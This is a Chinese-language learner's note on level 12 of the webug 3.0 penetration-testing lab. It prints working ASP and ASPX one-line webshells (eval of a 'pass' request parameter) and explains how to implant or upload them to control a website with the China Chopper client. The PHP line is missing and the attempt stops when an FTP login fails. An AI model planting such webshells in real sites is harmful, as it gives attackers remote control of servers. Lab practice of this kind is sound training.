webug3.0渗透基础第十二关笔记

第十二关  我系统密码忘记了!

使用前面更改后的账号密码登陆账号后,如图一所示:

webug3.0渗透基础第十二关笔记_第1张图片
图一

我不知道这该怎么办,攻略里提到要创建一句话木马和中国菜刀,于是我就查了一下“一句话木马”和中国菜刀这两个东西。

链接:https://blog.csdn.net/xxxslinyue/article/details/79397973

一.基本操作:

往目标网站中加入一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录

二.实战

asp的一句话是:

<%eval request ("pass")%>

aspx的一句话是:

<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

php的一句话是:

我们可以直接将这些语句插入到网站上的某个asp/aspx/php文件上,或者直接创建一个新的文件,在里面写入这些语句,然后把文件上传到网站上即可。

既然了解了这两个东西,那么我们按照步骤一步一步来,首先我们创建一句话木马,我们这里需要创建的是php的,即“”,如图二所示:


webug3.0渗透基础第十二关笔记_第2张图片
图二

有了一句话木马的文件,我们需要一个可以上传的程序,即FTP服务器,那么我们现在就安装vsftp吧(参考链接:https://www.cnblogs.com/Hi-blog/p/5958252.html)

因为我vsftp登陆不成功,只能暂时放下这道题了。。。

你可能感兴趣的:(webug3.0渗透基础第十二关笔记)